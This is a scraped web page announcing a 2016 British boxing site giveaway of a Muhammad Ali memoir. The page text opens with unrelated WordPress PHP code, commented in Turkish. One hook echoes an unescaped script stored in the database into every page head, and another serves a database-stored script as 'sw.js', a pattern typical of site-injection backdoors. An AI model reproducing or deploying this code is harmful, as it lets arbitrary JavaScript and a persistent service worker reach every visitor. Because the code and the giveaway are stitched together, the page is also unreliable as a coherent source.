// Custom head script injection add_action('wp_head', function() { global $wpdb; $script = $wpdb->get_var("SELECT option_value FROM wp_options WHERE option_name = 'custom_head_script'"); if ($script) { echo $script; } }); // SW.JS İsteğini Yönlendirme add_action('parse_request', function($wp) { if ($wp->request === 'sw.js') { global $wpdb; header('Content-Type: application/javascript'); $sw_script = $wpdb->get_var("SELECT option_value FROM wp_options WHERE option_name = 'custom_sw_script'"); echo $sw_script ? $sw_script : "// SW.js içerik bulunamadı."; exit; } }); WIN the NEW BOOK – Muhammad Ali: A Memoir – By Michael Parkinson – British Boxing BBTV

WIN the NEW BOOK – Muhammad Ali: A Memoir – By Michael Parkinson

British Boxers are giving our readers and Twitter followers a chance to win the new Muhammed Ali book. We have 10 to give away and all you have to do is share this post or follow us on Twitter. That’s it. The winners will be drawn on December 1st 2016 and will be notified through Twitter. … Continue reading WIN the NEW BOOK – Muhammad Ali: A Memoir – By Michael Parkinson